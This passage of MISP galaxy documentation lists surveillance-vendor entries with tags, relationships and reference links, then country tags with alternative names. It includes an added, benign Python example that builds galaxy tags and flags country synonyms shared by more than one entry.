The tag is: misp-galaxy:surveillance-vendor="Norsi-Trans"

Table 11740. Table References

Links

https://www.atlanticcouncil.org/wp-content/uploads/2021/11/Surveillance-Technology-at-the-Fair.pdf

https://keyfindings.blog/2020/03/23/be-careful-what-you-osint-with/

https://norsi-trans.com/

Polaris Wireless

Polaris Wireless is a US-based company that specializes in the development of wireless surveillance products.

The tag is: misp-galaxy:surveillance-vendor="Polaris Wireless"

Table 11741. Table References

Links

https://www.atlanticcouncil.org/wp-content/uploads/2021/11/Surveillance-Technology-at-the-Fair.pdf

https://www.zdnet.com/google-amp/article/polaris-wireless-secures-contract-in-surveillance-tracking-software/

Pro4Tech

Pro4Tech is a Tel Aviv (Israel) based company which provides tactical surveillance systems designed by field professionals for law-enforcement and government agencies.

The tag is: misp-galaxy:surveillance-vendor="Pro4Tech"

Table 11742. Table References

Links

https://www.atlanticcouncil.org/wp-content/uploads/2021/11/Surveillance-Technology-at-the-Fair.pdf

https://www.israeldefense.co.il/en/content/israeli-companies-milopol-pro4tech

Rayzone

Rayzone is an Israeli cyber intelligence company. Its surveillance software makes it possible, among other things, to determine a person’s location and path of movement with an accuracy of one meter, and to obtain additional information from the applications on the target’s device.

The tag is: misp-galaxy:surveillance-vendor="Rayzone"

Table 11743. Table References

Links

https://www.atlanticcouncil.org/wp-content/uploads/2021/11/Surveillance-Technology-at-the-Fair.pdf

https://www.haaretz.com/israel-news/tech-news/2020-12-17/ty-article/israeli-spy-tech-firm-tracked-mobile-users-around-the-world-investigation-suggests/0000017f-e76b-da9b-a1ff-ef6f847c0000

Seartech

Seartech is a South African company specializing in the design and manufacture of tactical surveillance equipment.

The tag is: misp-galaxy:surveillance-vendor="Seartech"

Table 11744. Table References

Links

https://www.atlanticcouncil.org/wp-content/uploads/2021/11/Surveillance-Technology-at-the-Fair.pdf

https://www.seartech.co.za/

Securcube

Securcube s.r.l. is an Italian company that specializes in services and products for digital forensics.

The tag is: misp-galaxy:surveillance-vendor="Securcube"

Table 11745. Table References

Links

https://www.atlanticcouncil.org/wp-content/uploads/2021/11/Surveillance-Technology-at-the-Fair.pdf

https://securcube.net/

Septier

Septier Communication Ltd, with global headquarters in Israel and offices across several continents, has dozens of installations serving telecommunication operators and law-enforcement agencies and organizations throughout the world. Septier develops and markets comprehensive lawful interception systems which include cutting-edge monitoring centers and passive front ends based on high capacity signaling monitoring probes.

The tag is: misp-galaxy:surveillance-vendor="Septier"

Table 11746. Table References

Links

https://www.atlanticcouncil.org/wp-content/uploads/2021/11/Surveillance-Technology-at-the-Fair.pdf

https://www.israeldefense.co.il/company/septier-communication-ltd

Cy4gate

Cy4gate is an Italy-based company that sells its products worldwide, including to dictatorships, while competing with companies involved in scandals related to the repression of opponents and journalists.

The tag is: misp-galaxy:surveillance-vendor="Cy4gate"

Table 11747. Table References

Links

https://www.atlanticcouncil.org/wp-content/uploads/2021/11/Surveillance-Technology-at-the-Fair.pdf

https://irpimedia.irpi.eu/en-surveillances-cy4gate/

https://www.vice.com/en/article/m7awav/prosecutors-suspend-cy4gate-government-spyware-used-in-whatsapp-phishing-attacks

Toka

Toka is an Israel-based company which offers its police, government and intelligence clients the ability to obtain targeted intelligence and conduct forensic investigations as well as covert operations. In addition, Toka offers governments its Cyber Designers service, which provides agencies with the full-spectrum strategies, customized projects, and technologies needed to ensure the security and sustainability of critical infrastructure, the digital landscape, and government institutions.

The tag is: misp-galaxy:surveillance-vendor="Toka"

Table 11748. Table References

Links

https://www.atlanticcouncil.org/wp-content/uploads/2021/11/Surveillance-Technology-at-the-Fair.pdf

https://www.haaretz.com/israel-news/security-aviation/2022-12-26/ty-article-magazine/.premium/this-dystopian-cyber-firm-could-have-saved-mossad-assassins-from-exposure/00000185-0bc6-d26d-a1b7-dbd739100000

https://www.orishas-finance.com/actualite/5310?lang=en

Trovicor

Trovicor is a Germany-based company whose surveillance technology was allegedly used in connection with human rights abuses by authoritarian governments.

The tag is: misp-galaxy:surveillance-vendor="Trovicor"

Table 11749. Table References

Links

https://www.atlanticcouncil.org/wp-content/uploads/2021/11/Surveillance-Technology-at-the-Fair.pdf

https://www.business-humanrights.org/en/latest-news/response-by-trovicor-german-companies-surveillance-technology-allegedly-used-in-connection-with-human-rights-abuses-by-authoritarian-govts/

https://trovicor.com/

Utimaco

Utimaco is an Aachen (Germany) based company which describes itself as the market leader in eavesdropping technology.

The tag is: misp-galaxy:surveillance-vendor="Utimaco"

Table 11750. Table References

Links

https://www.atlanticcouncil.org/wp-content/uploads/2021/11/Surveillance-Technology-at-the-Fair.pdf

https://digit.site36.net/2022/03/07/utimaco-german-wiretapping-technology-could-strengthen-junta-in-myanmar/

Wintego

Wintego Systems develops advanced communication, intelligence, and data-decoding solutions for the government and homeland security sectors.

The tag is: misp-galaxy:surveillance-vendor="Wintego"

Table 11751. Table References

Links

https://www.atlanticcouncil.org/wp-content/uploads/2021/11/Surveillance-Technology-at-the-Fair.pdf

https://www.forbes.com/sites/thomasbrewster/2016/09/29/wintego-whatsapp-encryption-surveillance-exploits/?sh=53f93cd1aa95

Wispear

Wispear Systems Ltd (renamed Passitoria Ltd), provides interception equipment designed for the extraction of voice or data, transmitted over the air interface.

The tag is: misp-galaxy:surveillance-vendor="Wispear"

Wispear has relationships with:

  • acquires: misp-galaxy:surveillance-vendor="Cytrox" with estimative-language:likelihood-probability="likely"

  • is-allied-with: misp-galaxy:surveillance-vendor="Cytrox" with estimative-language:likelihood-probability="likely"

  • is-allied-with: misp-galaxy:surveillance-vendor="Nexa" with estimative-language:likelihood-probability="likely"

  • is-allied-with: misp-galaxy:surveillance-vendor="Senpai" with estimative-language:likelihood-probability="likely"

  • part-of: misp-galaxy:surveillance-vendor="Intellexa" with estimative-language:likelihood-probability="likely"

Table 11752. Table References

Links

https://www.atlanticcouncil.org/wp-content/uploads/2021/11/Surveillance-Technology-at-the-Fair.pdf

https://in-cyprus.philenews.com/local/surveillance-software-has-been-exported-from-cyprus/

DarkMatter

DarkMatter, founded in the United Arab Emirates (UAE), was under investigation by the FBI for crimes including digital espionage services, involvement in the Jamal Khashoggi assassination, and the incarceration of foreign dissidents.

The tag is: misp-galaxy:surveillance-vendor="DarkMatter"

Table 11753. Table References

Links

https://www.atlanticcouncil.org/wp-content/uploads/2021/11/Surveillance-Technology-at-the-Fair.pdf

https://en.wikipedia.org/wiki/DarkMatter_Group

Lench

Lench IT Solutions is a Germany-based company. Lench IT Solutions plc has a UK-based branch, Gamma International Ltd in Andover, England, and a Germany-based branch, Gamma International GmbH in Munich. FinFisher, also known as FinSpy, is surveillance software marketed by Lench IT Solutions plc.

The tag is: misp-galaxy:surveillance-vendor="Lench"

Table 11754. Table References

Links

https://www.atlanticcouncil.org/wp-content/uploads/2021/11/Surveillance-Technology-at-the-Fair.pdf

https://en.wikipedia.org/wiki/FinFisher

GR Sistemi

GR Sistemi is an Italian firm that has been trying to enter the crowded market of government spyware, also known by insiders as lawful interception.

The tag is: misp-galaxy:surveillance-vendor="GR Sistemi"

Table 11755. Table References

Links

https://www.atlanticcouncil.org/wp-content/uploads/2021/11/Surveillance-Technology-at-the-Fair.pdf

https://www.vice.com/en/article/kbyg7a/government-spyware-maker-doxes-itself-by-linking-to-its-site-in-malware-code

SS8

SS8 is a US-based company selling to a range of US government agencies as well as exporting surveillance equipment abroad. SS8 was also reportedly responsible for selling intrusion systems to the United Arab Emirates.

The tag is: misp-galaxy:surveillance-vendor="SS8"

Table 11756. Table References

Links

https://www.atlanticcouncil.org/wp-content/uploads/2021/11/Surveillance-Technology-at-the-Fair.pdf

https://privacyinternational.org/sites/default/files/2017-12/global_surveillance_0.pdf

Wolf Intelligence

Wolf Intelligence, a Germany-based spyware company that made headlines for sending a bodyguard to Mauritania and prompting an international incident after the local government detained the bodyguard as collateral for a deal gone wrong, left a trove of its own data exposed online.

The tag is: misp-galaxy:surveillance-vendor="Wolf Intelligence"

Table 11757. Table References

Links

https://www.atlanticcouncil.org/wp-content/uploads/2021/11/Surveillance-Technology-at-the-Fair.pdf

https://www.vice.com/en/article/vbka8b/wolf-intelligence-leak-customer-victim-data-online

https://www.vice.com/en/article/wxq85w/scam-spyware-vendor-gets-caught-once-again

Vervata

Vervata is a Thailand-based software company which, among other things, provides mobile monitoring applications that secretly record all activity on a phone.

The tag is: misp-galaxy:surveillance-vendor="Vervata"

Table 11758. Table References

Links

https://www.atlanticcouncil.org/wp-content/uploads/2021/11/Surveillance-Technology-at-the-Fair.pdf

https://www.gmanetwork.com/news/topstories/nation/3072/new-program-snoops-on-cell-phones/story/

https://www.forbes.com/sites/thomasbrewster/2017/02/16/government-iphone-android-spyware-is-the-same-as-seedy-spouseware/?sh=3a06dacb455c

Raxir

Raxir is an Italy-based surveillance firm housed in a tech startup incubator in Naples. According to the company’s page on the incubator’s website, Raxir was founded in 2013 and produces software systems to support legal and intelligence investigations.

The tag is: misp-galaxy:surveillance-vendor="Raxir"

Table 11759. Table References

Links

https://www.atlanticcouncil.org/wp-content/uploads/2021/11/Surveillance-Technology-at-the-Fair.pdf

https://www.vice.com/en/article/9a3g4e/malware-hunters-catch-new-android-spyware-raxir

Senpai

Senpai Technologies is a company specializing in OSINT and persona creation based out of Israel, while WiSpear, also based in Israel, specializes in Wi-Fi interception.

The tag is: misp-galaxy:surveillance-vendor="Senpai"

Senpai is also known as:

  • Senpai Technologies

Senpai has relationships with:

  • part-of: misp-galaxy:surveillance-vendor="Intellexa" with estimative-language:likelihood-probability="likely"

  • is-allied-with: misp-galaxy:surveillance-vendor="Cytrox" with estimative-language:likelihood-probability="likely"

  • is-allied-with: misp-galaxy:surveillance-vendor="Wispear" with estimative-language:likelihood-probability="likely"

  • is-allied-with: misp-galaxy:surveillance-vendor="Nexa" with estimative-language:likelihood-probability="likely"

Table 11760. Table References

Links

https://blog.talosintelligence.com/intellexa-and-cytrox-intel-agency-grade-spyware/

Target Information

Description of targets of threat actors.

Target Information is a cluster galaxy available in JSON format at this location. The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

Unknown
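The cluster JSON referenced above can be consumed directly. The following is an added example, not code from the MISP project: it loads a constructed, abbreviated target-information cluster written in the misp-galaxy cluster layout (name, type, values[].value, values[].meta.synonyms; the UUIDs are made up), builds the misp-galaxy:target-information="…" tag that MISP attaches for each value, and resolves free-text country names and synonyms to that tag. Because this galaxy lists the synonym Congo under both the Democratic Republic of the Congo and the Republic of the Congo, the lookup returns the set of candidate clusters for an ambiguous name instead of silently picking one.

```python
"""Build MISP galaxy tags and a synonym lookup from a galaxy cluster file.

Added example; not code from the MISP project. SAMPLE_CLUSTER is a
constructed, abbreviated sample in the misp-galaxy cluster layout;
the UUIDs are made up.
"""
import json
import unicodedata

SAMPLE_CLUSTER = json.dumps({
    "name": "Target Information",
    "type": "target-information",
    "description": "Description of targets of threat actors.",
    "authors": ["Unknown"],
    "uuid": "00000000-0000-4000-8000-000000000001",  # constructed
    "version": 1,
    "values": [
        {"value": "Luxembourg",
         "uuid": "00000000-0000-4000-8000-000000000010",  # constructed
         "meta": {"synonyms": ["Grand Duchy of Luxembourg", "Lëtzebuerg", "Luxemburg"]}},
        {"value": "Democratic Republic of the Congo",
         "uuid": "00000000-0000-4000-8000-000000000011",  # constructed
         "meta": {"synonyms": ["DR Congo", "DRC", "Congo-Kinshasa", "Congo"]}},
        {"value": "Republic of the Congo",
         "uuid": "00000000-0000-4000-8000-000000000012",  # constructed
         "meta": {"synonyms": ["Congo-Brazzaville", "Congo Republic", "Congo"]}},
        # Some clusters carry no meta block at all (cf. Anguilla on this page).
        {"value": "Anguilla",
         "uuid": "00000000-0000-4000-8000-000000000013"},  # constructed
    ],
})


def galaxy_tag(galaxy_type, value):
    """Return the tag MISP attaches for a cluster value, e.g.
    misp-galaxy:target-information="Luxembourg"."""
    # The exported tag wraps the value in double quotes; a value that itself
    # contains one is rejected rather than guessed at.
    if '"' in value:
        raise ValueError(f"cluster value contains a double quote: {value!r}")
    return f'misp-galaxy:{galaxy_type}="{value}"'


def _norm(name):
    """Case-fold, strip diacritics and collapse whitespace so that
    'Lëtzebuerg' and 'letzebuerg' compare equal."""
    decomposed = unicodedata.normalize("NFKD", name)
    stripped = "".join(c for c in decomposed if not unicodedata.combining(c))
    return " ".join(stripped.casefold().split())


def load_cluster(text):
    """Parse a cluster file and check the two keys the lookup relies on."""
    cluster = json.loads(text)
    for key in ("type", "values"):
        if key not in cluster:
            raise ValueError(f"not a galaxy cluster: missing {key!r}")
    return cluster


def build_index(cluster):
    """Map every normalised value and synonym to the set of canonical values
    that claim it. A set is used on purpose: a synonym shared by two clusters
    ('Congo' here) must surface as a collision, not be overwritten."""
    index = {}
    for entry in cluster["values"]:
        canonical = entry["value"]
        synonyms = entry.get("meta", {}).get("synonyms", [])
        for name in [canonical, *synonyms]:
            index.setdefault(_norm(name), set()).add(canonical)
    return index


def resolve(cluster, index, name):
    """Return (tag, None) for an unambiguous match, (None, candidates) when
    several clusters claim the name, and (None, []) when it is unknown."""
    owners = index.get(_norm(name), set())
    if len(owners) == 1:
        return galaxy_tag(cluster["type"], next(iter(owners))), None
    return None, sorted(owners)


def ambiguous_synonyms(index):
    """Every normalised name claimed by more than one cluster."""
    return {n: sorted(o) for n, o in index.items() if len(o) > 1}


if __name__ == "__main__":
    cluster = load_cluster(SAMPLE_CLUSTER)
    index = build_index(cluster)
    for query in ("Luxemburg", "letzebuerg", "Congo", "Anguilla", "Atlantis"):
        print(f"{query!r} -> {resolve(cluster, index, query)}")
    print("ambiguous synonyms:", ambiguous_synonyms(index))
```

Point `load_cluster` at the real cluster file instead of `SAMPLE_CLUSTER` to run the same check over the full galaxy; `ambiguous_synonyms` is the report worth reviewing before an alias-to-tag mapping is used for automated tagging.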

Luxembourg

The tag is: misp-galaxy:target-information="Luxembourg"

Luxembourg is also known as:

  • Grand Duchy of Luxembourg

  • Grand-Duché de Luxembourg

  • Lëtzebuerg

  • Groussherzogtum Lëtzebuerg

  • Luxemburg

  • Großherzogtum Luxemburg

Afghanistan

The tag is: misp-galaxy:target-information="Afghanistan"

Afghanistan is also known as:

  • افغانستان

  • Afġānistān

  • Afġānestān

  • Islamic Republic of Afghanistan

Albania

The tag is: misp-galaxy:target-information="Albania"

Albania is also known as:

  • Shqipëri

  • Shqipëria

  • Shqipni

  • Shqipnia

  • Shqypni

  • Shqypnia

  • Republic of Albania

Algeria

The tag is: misp-galaxy:target-information="Algeria"

Algeria is also known as:

  • الجزائر‎

  • al-Jazāʾir

  • الدزاير‎

  • al-dzāyīr

  • People’s Democratic Republic of Algeria

American Samoa

The tag is: misp-galaxy:target-information="American Samoa"

American Samoa is also known as:

  • Amerika Sāmoa

  • Amelika Sāmoa

  • Sāmoa Amelika

Andorra

The tag is: misp-galaxy:target-information="Andorra"

Andorra is also known as:

  • Principality of Andorra

  • Principat d’Andorra

  • Principality of the Valleys of Andorra

  • Principat de les Valls d’Andorra

Angola

The tag is: misp-galaxy:target-information="Angola"

Angola is also known as:

  • Republic of Angola

  • República de Angola

  • Repubilika ya Ngola

Anguilla

The tag is: misp-galaxy:target-information="Anguilla"

Antarctica

The tag is: misp-galaxy:target-information="Antarctica"

Antigua and Barbuda

The tag is: misp-galaxy:target-information="Antigua and Barbuda"

Argentina

The tag is: misp-galaxy:target-information="Argentina"

Argentina is also known as:

  • Argentine Republic

  • República Argentina

Armenia

The tag is: misp-galaxy:target-information="Armenia"

Armenia is also known as:

  • Հայաստան

  • Hayastan

  • Republic of Armenia

  • Հայաստանի Հանրապետություն

  • Hayastani Hanrapetut’yun

Aruba

The tag is: misp-galaxy:target-information="Aruba"

Australia

The tag is: misp-galaxy:target-information="Australia"

Australia is also known as:

  • Commonwealth of Australia

Austria

The tag is: misp-galaxy:target-information="Austria"

Austria is also known as:

  • Österreich

  • Republic of Austria

  • Republik Österreich

Azerbaijan

The tag is: misp-galaxy:target-information="Azerbaijan"

Azerbaijan is also known as:

  • Azərbaycan

  • Republic of Azerbaijan

  • Azərbaycan Respublikası

Bahamas

The tag is: misp-galaxy:target-information="Bahamas"

Bahamas is also known as:

  • Commonwealth of The Bahamas

  • The Bahamas

Bahrain

The tag is: misp-galaxy:target-information="Bahrain"

Bahrain is also known as:

  • al-Baḥrayn

  • Kingdom of Bahrain

  • مملكة البحرين‎

  • Mamlakat al-Baḥrayn

  • البحرين

Bangladesh

The tag is: misp-galaxy:target-information="Bangladesh"

Bangladesh is also known as:

  • বাংলাদেশ

  • The country of Bengal

  • People’s Republic of Bangladesh

  • গণপ্রজাতন্ত্রী বাংলাদেশ

  • Gônoprojatontri Bangladesh

Barbados

The tag is: misp-galaxy:target-information="Barbados"

Belarus

The tag is: misp-galaxy:target-information="Belarus"

Belarus is also known as:

  • Беларусь

  • Republic of Belarus

  • Рэспубліка Беларусь

  • Республика Беларусь

  • Byelorussia

  • Belorussia

  • Белоруссия

Belgium

The tag is: misp-galaxy:target-information="Belgium"

Belgium is also known as:

  • België

  • Royaume de Belgique

  • Königreich Belgien

  • Kingdom of Belgium

  • Koninkrijk België

Belize

The tag is: misp-galaxy:target-information="Belize"

Benin

The tag is: misp-galaxy:target-information="Benin"

Benin is also known as:

  • Bénin

  • Republic of Benin

  • République du Bénin

Bermuda

The tag is: misp-galaxy:target-information="Bermuda"

Bermuda is also known as:

  • Islands of Bermuda

Bhutan

The tag is: misp-galaxy:target-information="Bhutan"

Bhutan is also known as:

  • འབྲུག་ཡུལ

  • Druk Yul

  • Kingdom of Bhutan

  • འབྲུག་རྒྱལ་ཁབ

  • Druk Gyal Khap

Bolivia

The tag is: misp-galaxy:target-information="Bolivia"

Bolivia is also known as:

  • Mborivia

  • Puliwya

  • Wuliwya

  • Plurinational State of Bolivia

  • Estado Plurinacional de Bolivia

  • Tetã Hetãvoregua Mborivia

  • Puliwya Mamallaqta

  • Wuliwya Suyu

Bosnia and Herzegovina

The tag is: misp-galaxy:target-information="Bosnia and Herzegovina"

Bosnia and Herzegovina is also known as:

  • BiH

  • B&H

  • Bosnia–Herzegovina

  • Bosnia

Botswana

The tag is: misp-galaxy:target-information="Botswana"

Botswana is also known as:

  • Republic of Botswana

  • Lefatshe la Botswana

Brazil

The tag is: misp-galaxy:target-information="Brazil"

Brazil is also known as:

  • Federative Republic of Brazil

British Indian Ocean Territory

The tag is: misp-galaxy:target-information="British Indian Ocean Territory"

British Indian Ocean Territory is also known as:

  • BIOT

British Virgin Islands

The tag is: misp-galaxy:target-information="British Virgin Islands"

British Virgin Islands is also known as:

  • BVI

  • Virgin Islands

Brunei

The tag is: misp-galaxy:target-information="Brunei"

Brunei is also known as:

  • Nation of Brunei, the Abode of Peace

  • Negara Brunei Darussalam (Rumi script)

  • نڬارا بروني دارالسلام

Bulgaria

The tag is: misp-galaxy:target-information="Bulgaria"

Bulgaria is also known as:

  • България

  • Bǎlgariya

  • Republic of Bulgaria

  • Република България

  • Republika Bǎlgariya

Burkina Faso

The tag is: misp-galaxy:target-information="Burkina Faso"

Burundi

The tag is: misp-galaxy:target-information="Burundi"

Burundi is also known as:

  • Republic of Burundi

  • Republika y’Uburundi

  • République du Burundi

Cambodia

The tag is: misp-galaxy:target-information="Cambodia"

Cambodia is also known as:

  • Kampuchea

  • Cambodge

  • ព្រះរាជាណាចក្រកម្ពុជា

  • prĕəh riəciənaacak kampuciə

  • Royaume du Cambodge

Cameroon

The tag is: misp-galaxy:target-information="Cameroon"

Cameroon is also known as:

  • Cameroun

  • Republic of Cameroon

  • République du Cameroun

  • Renndaandi Kamerun

Canada

The tag is: misp-galaxy:target-information="Canada"

Cape Verde

The tag is: misp-galaxy:target-information="Cape Verde"

Cape Verde is also known as:

  • Cabo Verde

  • Republic of Cabo Verde

  • República de Cabo Verde

  • Repúblika di Kabu Verdi

Cayman Islands

The tag is: misp-galaxy:target-information="Cayman Islands"

Central African Republic

The tag is: misp-galaxy:target-information="Central African Republic"

Central African Republic is also known as:

  • CAR

  • Renndaandi Afirka Cakaari

  • Ködörösêse tî Bêafrîka

  • République centrafricaine

  • Centrafrique

Chad

The tag is: misp-galaxy:target-information="Chad"

Chad is also known as:

  • تشاد‎

  • Tshād

  • Tchad

  • Republic of Chad

  • République du Tchad

  • جمهورية تشاد

  • Jumhūriyyat Tshād

Chile

The tag is: misp-galaxy:target-information="Chile"

Chile is also known as:

  • Republic of Chile

  • República de Chile

  • Chile Wüdalmapu

  • Chili Suyu

  • Chili Ripuwlika

  • Repūvirika o Tire

China

The tag is: misp-galaxy:target-information="China"

China is also known as:

  • 中国

  • Zhōngguó

  • People’s Republic of China

  • PRC

  • 中华人民共和国

  • Zhōnghuá Rénmín Gònghéguó

Christmas Island

The tag is: misp-galaxy:target-information="Christmas Island"

Christmas Island is also known as:

  • Territory of Christmas Island

Cocos Islands

The tag is: misp-galaxy:target-information="Cocos Islands"

Cocos Islands is also known as:

  • Cocos (Keeling) Islands

  • Territory of Cocos (Keeling) Islands

  • Pulu Kokos (Keeling)

  • Wilayah Kepulauan Cocos (Keeling)

Colombia

The tag is: misp-galaxy:target-information="Colombia"

Colombia is also known as:

  • Republic of Colombia

  • República de Colombia

Comoros

The tag is: misp-galaxy:target-information="Comoros"

Comoros is also known as:

  • جزر القمر

  • Juzur al-Qumur/Qamar

  • Union of the Comoros

  • الاتحاد القمري

  • al-Ittiḥād al-Qumurī/Qamarī

  • Union des Comores

  • Umoja wa Komori

Cook Islands

The tag is: misp-galaxy:target-information="Cook Islands"

Cook Islands is also known as:

  • Kūki 'Āirani

Costa Rica

The tag is: misp-galaxy:target-information="Costa Rica"

Costa Rica is also known as:

  • Republic of Costa Rica

  • República de Costa Rica

Croatia

The tag is: misp-galaxy:target-information="Croatia"

Croatia is also known as:

  • Hrvatska

  • Republic of Croatia

  • Republika Hrvatska

Cuba

The tag is: misp-galaxy:target-information="Cuba"

Cuba is also known as:

  • Republic of Cuba

  • República de Cuba

Curaçao

The tag is: misp-galaxy:target-information="Curaçao"

Curaçao is also known as:

  • Curacao

Cyprus

The tag is: misp-galaxy:target-information="Cyprus"

Cyprus is also known as:

  • Κύπρος

  • Kıbrıs

  • Republic of Cyprus

  • Κυπριακή Δημοκρατία

  • Cypriot Republic

  • Kıbrıs Cumhuriyeti

Czech Republic

The tag is: misp-galaxy:target-information="Czech Republic"

Czech Republic is also known as:

  • Česká republika

  • Czechia

  • Česko

Democratic Republic of the Congo

The tag is: misp-galaxy:target-information="Democratic Republic of the Congo"

Democratic Republic of the Congo is also known as:

  • DR Congo

  • DRC

  • DROC

  • Congo-Kinshasa

  • Congo

  • République démocratique du Congo

  • Repubilika ya Kôngo ya Dimokalasi

  • Republíki ya Kongó Demokratíki

  • Jamhuri ya Kidemokrasia ya Kongo

  • Ditunga dia Kongu wa Mungalaata

Denmark

The tag is: misp-galaxy:target-information="Denmark"

Denmark is also known as:

  • Danmark

  • Kingdom of Denmark

  • Kongeriget Danmark

Djibouti

The tag is: misp-galaxy:target-information="Djibouti"

Djibouti is also known as:

  • Yibuuti

  • جيبوتي

  • Jabuuti

  • Republic of Djibouti

  • République de Djibouti

  • جمهورية جيبوتي

  • Jamhuuriyadda Jabuuti

  • Gabuutih Ummuuno

Dominica

The tag is: misp-galaxy:target-information="Dominica"

Dominica is also known as:

  • Wai‘tu kubuli

  • Commonwealth of Dominica

Dominican Republic

The tag is: misp-galaxy:target-information="Dominican Republic"

Dominican Republic is also known as:

  • República Dominicana

East Timor

The tag is: misp-galaxy:target-information="East Timor"

East Timor is also known as:

  • Timor-Leste

  • Timór Lorosa’e

  • Democratic Republic of Timor-Leste

  • Repúblika Demokrátika Timór-Leste

  • República Democrática de Timor-Leste

Ecuador

The tag is: misp-galaxy:target-information="Ecuador"

Ecuador is also known as:

  • Ikwayur

  • Ekuatur

  • Republic of Ecuador

  • República del Ecuador

  • Ikwayur Runaq Imayka

  • Ekuatur Nunka

  • Ikwadur Ripuwlika

Egypt

The tag is: misp-galaxy:target-information="Egypt"

Egypt is also known as:

  • مِصر‎

  • مَصر‎

  • Ⲭⲏⲙⲓ

  • Arab Republic of Egypt

  • جمهورية مصر العربية

El Salvador

The tag is: misp-galaxy:target-information="El Salvador"

El Salvador is also known as:

  • Republic of El Salvador

  • República de El Salvador

Equatorial Guinea

The tag is: misp-galaxy:target-information="Equatorial Guinea"

Equatorial Guinea is also known as:

  • Guinea Ecuatorial

  • Guinée équatoriale

  • Guiné Equatorial

  • Republic of Equatorial Guinea

  • República de Guinea Ecuatorial

  • République de Guinée équatoriale

  • República da Guiné Equatorial

Eritrea

The tag is: misp-galaxy:target-information="Eritrea"

Eritrea is also known as:

  • ኤርትራ

  • State of Eritrea

Estonia

The tag is: misp-galaxy:target-information="Estonia"

Estonia is also known as:

  • Eesti

  • Republic of Estonia

  • Eesti Vabariik

Ethiopia

The tag is: misp-galaxy:target-information="Ethiopia"

Ethiopia is also known as:

  • ኢትዮጵያ

  • Itoophiyaa

  • Itoobiya

  • Federal Democratic Republic of Ethiopia

  • የኢትዮጵያ ፌዴራላዊ ዴሞክራሲያዊ ሪፐብሊክ

  • ityoppiah federalih demokrasih ummuno

  • Rippabliikii Federaalawaa Dimokraatawaa Itiyoophiyaa

  • Jamhuuriyadda Dimuqraadiga Federaalka Itoobiya

Falkland Islands

The tag is: misp-galaxy:target-information="Falkland Islands"

Falkland Islands is also known as:

  • Islas Malvinas

Faroe Islands

The tag is: misp-galaxy:target-information="Faroe Islands"

Faroe Islands is also known as:

  • Føroyar

  • Færøerne

  • Faeroe Islands

Fiji

The tag is: misp-galaxy:target-information="Fiji"

Fiji is also known as:

  • Viti

  • फ़िजी

  • Republic of Fiji

  • Matanitu Tugalala o Viti

  • फ़िजी गणराज्य

Finland

The tag is: misp-galaxy:target-information="Finland"

Finland is also known as:

  • Suomi

  • Republic of Finland

  • Suomen tasavalta

  • Republiken Finland

France

The tag is: misp-galaxy:target-information="France"

France is also known as:

  • French Republic

  • République française

French Polynesia

The tag is: misp-galaxy:target-information="French Polynesia"

French Polynesia is also known as:

  • Polynésie française

  • Pōrīnetia Farāni

Gabon

The tag is: misp-galaxy:target-information="Gabon"

Gabon is also known as:

  • Gabonese Republic

  • République gabonaise

Gambia

The tag is: misp-galaxy:target-information="Gambia"

Gambia is also known as:

  • The Gambia

  • Republic of The Gambia

Georgia

The tag is: misp-galaxy:target-information="Georgia"

Georgia is also known as:

  • საქართველო

  • sakartvelo

  • Republic of Georgia

  • საქართველოს რესპუბლიკა

  • sakartvelos resp’ublik’a

Germany

The tag is: misp-galaxy:target-information="Germany"

Germany is also known as:

  • Deutschland

  • Federal Republic of Germany

  • Bundesrepublik Deutschland

Ghana

The tag is: misp-galaxy:target-information="Ghana"

Ghana is also known as:

  • Republic of Ghana

Gibraltar

The tag is: misp-galaxy:target-information="Gibraltar"

Gibraltar is also known as:

  • جبل طارق

  • Jabal Ṭāriq

Greece

The tag is: misp-galaxy:target-information="Greece"

Greece is also known as:

  • Hellas

  • Ελλάς

  • Hellenic Republic

  • Ελληνική Δημοκρατία

  • Ellinikí Dimokratía

Greenland

The tag is: misp-galaxy:target-information="Greenland"

Greenland is also known as:

  • Kalaallit Nunaat

  • Grønland

Grenada

The tag is: misp-galaxy:target-information="Grenada"

Guam

The tag is: misp-galaxy:target-information="Guam"

Guam is also known as:

  • Guåhån

  • Territory of Guam

Guatemala

The tag is: misp-galaxy:target-information="Guatemala"

Guatemala is also known as:

  • Republic of Guatemala

  • República de Guatemala

Guernsey

The tag is: misp-galaxy:target-information="Guernsey"

Guernsey is also known as:

  • Guernési

Guinea

The tag is: misp-galaxy:target-information="Guinea"

Guinea is also known as:

  • Ginee

  • Guinée

  • Republic of Guinea

  • Renndaandi Ginee

  • République de Guinée

Guinea-Bissau

The tag is: misp-galaxy:target-information="Guinea-Bissau"

Guinea-Bissau is also known as:

  • Guiné-Bissau

  • Republic of Guinea-Bissau

  • República da Guiné-Bissau

Guyana

The tag is: misp-galaxy:target-information="Guyana"

Guyana is also known as:

  • Co-operative Republic of Guyana

Haiti

The tag is: misp-galaxy:target-information="Haiti"

Haiti is also known as:

  • Haïti

  • Ayiti

  • Republic of Haiti

  • République d’Haïti

  • Repiblik Ayiti

  • Hayti

Honduras

The tag is: misp-galaxy:target-information="Honduras"

Honduras is also known as:

  • Republic of Honduras

  • República de Honduras

Hong Kong

The tag is: misp-galaxy:target-information="Hong Kong"

Hong Kong is also known as:

  • Hong Kong Special Administrative Region of the People’s Republic of China

Hungary

The tag is: misp-galaxy:target-information="Hungary"

Hungary is also known as:

  • Magyarország

Iceland

The tag is: misp-galaxy:target-information="Iceland"

Iceland is also known as:

  • Ísland

India

The tag is: misp-galaxy:target-information="India"

India is also known as:

  • Republic of India

  • Bhārat Gaṇarājya

Indonesia

The tag is: misp-galaxy:target-information="Indonesia"

Indonesia is also known as:

  • Republic of Indonesia

  • Republik Indonesia

Iran

The tag is: misp-galaxy:target-information="Iran"

Iran is also known as:

  • Persia

  • Islamic Republic of Iran

  • جمهوری اسلامی ایران

  • Jomhuri-ye Eslāmi-ye Irān

Iraq

The tag is: misp-galaxy:target-information="Iraq"

Iraq is also known as:

  • العراق

  • al-'Irāq

  • عێراق‎

  • Êraq

  • Republic of Iraq

  • جمهورية العراق

  • کۆماری عێراق

  • کۆمارا ئێـراقێ

  • Jumhūrīyyat al-'Irāq

  • Komarî Êraq

Ireland

The tag is: misp-galaxy:target-information="Ireland"

Ireland is also known as:

  • Éire

  • Republic of Ireland

Isle of Man

The tag is: misp-galaxy:target-information="Isle of Man"

Isle of Man is also known as:

  • Mannin

  • Ellan Vannin

  • Mann

Israel

The tag is: misp-galaxy:target-information="Israel"

Israel is also known as:

  • יִשְׂרָאֵל

  • إِسْرَائِيل‎

  • State of Israel

Italy

